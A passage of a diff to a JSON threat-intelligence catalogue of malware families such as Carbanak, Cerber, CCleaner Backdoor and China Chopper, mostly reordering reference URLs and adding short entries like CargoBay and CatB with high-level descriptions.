+ "https://www.secureworks.com/research/threat-profiles/gold-niagara",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html",
+ "https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/",
+ "https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf",
+ "https://www.mandiant.com/resources/evolution-of-fin7",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html",
+ "https://unit42.paloaltonetworks.com/atoms/mulelibra/",
+ "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html"
],
"synonyms": [
"Anunak",
@@ -16048,10 +17093,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp",
- "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf",
+ "https://blog.avast.com/2013/04/08/carberp_epitaph/",
"https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://blog.avast.com/2013/04/08/carberp_epitaph/"
+ "https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf",
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree"
],
"synonyms": [],
"type": []
@@ -16064,26 +17111,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412",
- "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/",
"https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "1d9fbf33-faea-40c1-b543-c7b39561f0ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e",
"value": "Cardinal RAT"
},
+ {
+ "description": "CargoBay is a newer malware family which was first observed in 2022 and is notable for being written in the Rust language. CargoBay is likely based on source code taken from 'Black Hat Rust' GitHub project (https://github.com/skerkour/black-hat-rust). CargoBay is usually distributed via phishing emails, and the malware binaries may be disguised as legitimate applications. Upon execution, the malware starts by performing environmental checks such as checking its execution path and the configured system language. If the tests pass, then the malware proceeds to gather basic system information and register with its C2 via HTTP from which it receives JSON-formatted jobs to carry out. CargoBay can execute commands via the command line and downloading additional malware binaries.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay",
+ "https://exchange.xforce.ibmcloud.com/malware-analysis/guid:87abff769352d8208e403331c86eb95f"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cfdc931d-d3da-4b2a-9fef-42592c0f5c5f",
+ "value": "CargoBay"
+ },
{
"description": "CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.",
"meta": {
@@ -16121,18 +17175,23 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "63b3e6fb-9bb8-43dc-9cbf-7681b049b5d6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3198501e-0ff0-43b7-96f0-321b463ab656",
"value": "Casper"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.catb",
+ "https://minerva-labs.com/blog/new-catb-ransomware-employs-2-year-old-dll-hijacking-technique-to-evade-detection/",
+ "https://www.sentinelone.com/blog/decrypting-catb-ransomware-analyzing-their-latest-attack-methods/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a96445d6-4bbb-4b9a-a761-83759108a403",
+ "value": "CatB"
+ },
{
"description": "",
"meta": {
@@ -16147,31 +17206,31 @@
"value": "Catchamas"
},
{
- "description": "",
+ "description": "According to CrowdStrike, this backdoor was discovered embedded in the legitimate, signed version of CCleaner 5.33, and thus constitutes a supply chain attack.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
- "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
"https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://risky.biz/whatiswinnti/",
- "https://stmxcsr.com/persistence/print-processor.html",
- "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
- "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
- "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html",
- "https://blog.avast.com/progress-on-ccleaner-investigation",
- "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
- "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
"https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities",
- "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
- "https://twitter.com/craiu/status/910148928796061696",
- "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
- "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
- "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
+ "https://www.wired.com/story/ccleaner-malware-targeted-tech-firms",
"https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident",
- "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html"
+ "https://risky.biz/whatiswinnti/",
+ "https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf",
+ "https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/",
+ "https://blog.avast.com/progress-on-ccleaner-investigation",
+ "https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer",
+ "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/",
+ "https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident",
+ "https://twitter.com/craiu/status/910148928796061696",
+ "https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/",
+ "http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/",
+ "http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor",
+ "https://stmxcsr.com/persistence/print-processor.html",
+ "https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html"
],
"synonyms": [
"DIRTCLEANER"
@@ -16181,6 +17240,19 @@
"uuid": "c51ee09b-fc2d-41fd-a43b-426a4f337139",
"value": "CCleaner Backdoor"
},
+ {
+ "description": "Mandiant characterizes this malware as a downloader and shellcode stager.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader",
+ "https://www.mandiant.com/resources/blog/russian-targeting-gov-business"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0333d13e-e01f-46cd-a030-448bbf043c10",
+ "value": "CEELOADER"
+ },
{
"description": "",
"meta": {
@@ -16201,22 +17273,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/",
- "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html",
+ "https://www.youtube.com/watch?v=y8Z9KnL8s8s",
"https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/",
+ "https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
"https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
"http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.youtube.com/watch?v=y8Z9KnL8s8s"
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus"
],
"synonyms": [],
"type": []
@@ -16281,24 +17354,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chainshot",
- "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack",
- "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/",
"https://researchcenter.paloaltonetworks.com/2018/09/unit42-slicing-dicing-cve-2018-5002-payloads-new-chainshot-malware/",
+ "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/",
"https://www.vice.com/en_us/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec",
- "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/"
+ "https://www.icebrg.io/blog/adobe-flash-zero-day-targeted-attack",
+ "https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a032460e-c54c-11e8-9965-43b7b6469a65",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "36f9a5e0-9a78-4b9a-9072-1596c91b59b6",
"value": "Chainshot"
},
@@ -16320,15 +17384,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos",
+ "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html",
"https://www.bleepingcomputer.com/news/security/roblox-game-pass-store-used-to-sell-ransomware-decryptor/",
- "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/",
- "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging",
"https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/",
- "https://twitter.com/vinopaljiri/status/1519645742440329216",
- "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia",
+ "https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree",
"https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction",
- "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html"
+ "https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html",
+ "https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia",
+ "https://twitter.com/vinopaljiri/status/1519645742440329216",
+ "https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/"
],
"synonyms": [
"FakeRyuk",
@@ -16338,7 +17403,7 @@
"type": []
},
"uuid": "fb760029-9331-4ba0-b644-d47a8e6d3ad2",
- "value": "Chaos"
+ "value": "Chaos (Windows)"
},
{
"description": "According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.",
@@ -16376,11 +17441,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chches",
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
- "https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
"https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html",
+ "https://www.jpcert.or.jp/magazine/acreport-ChChes.html",
"https://www.jpcert.or.jp/magazine/acreport-ChChes_ps1.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html"
],
"synonyms": [
"HAYMAKER",
@@ -16396,8 +17461,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray",
- "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c",
"https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/",
+ "https://www.us-cert.gov/ncas/analysis-reports/ar20-045c",
"https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf"
],
"synonyms": [
@@ -16426,8 +17491,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/New-Memory-Scraping-Technique-in-Cherry-Picker-PoS-Malware/",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/"
+ "https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html"
],
"synonyms": [
"cherry_picker",
@@ -16457,78 +17523,79 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper",
- "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
- "https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/",
- "https://attack.mitre.org/groups/G0125/",
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/",
- "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
- "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/",
- "https://twitter.com/ESETresearch/status/1366862946488451088",
- "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf",
- "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/",
- "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf",
- "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
- "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
- "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html",
- "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
- "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
- "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
- "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
- "https://blog.joshlemon.com.au/hafnium-exchange-attacks/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a",
- "https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks",
- "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
- "https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/",
- "https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders",
- "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
- "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
- "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
- "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
- "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers",
- "https://www.secureworks.com/research/threat-profiles/bronze-president",
- "https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion",
- "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers",
- "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-259a",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
- "https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
- "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968",
- "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
- "https://redcanary.com/blog/microsoft-exchange-attacks",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/",
- "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/",
- "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
- "https://www.youtube.com/watch?v=rn-6t7OygGk",
- "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
- "https://attack.mitre.org/software/S0020/",
- "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
- "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/",
- "https://unit42.paloaltonetworks.com/china-chopper-webshell/",
"https://attack.mitre.org/groups/G0096",
- "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
+ "https://redcanary.com/blog/microsoft-exchange-attacks",
+ "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits",
"https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers",
- "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://www.youtube.com/watch?v=rn-6t7OygGk",
+ "https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html",
+ "https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968",
+ "https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-259a",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
+ "https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/",
"https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4"
+ "https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/",
+ "https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection",
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
+ "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf",
+ "https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf",
+ "https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html",
+ "https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
+ "https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html",
+ "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/",
+ "https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html",
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
+ "https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4",
+ "https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html",
+ "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html",
+ "https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf",
+ "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/",
+ "https://blog.joshlemon.com.au/hafnium-exchange-attacks/",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express",
+ "https://attack.mitre.org/groups/G0125/",
+ "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
+ "https://attack.mitre.org/software/S0020/",
+ "https://unit42.paloaltonetworks.com/china-chopper-webshell/",
+ "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers",
+ "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html",
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/",
+ "https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/",
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers",
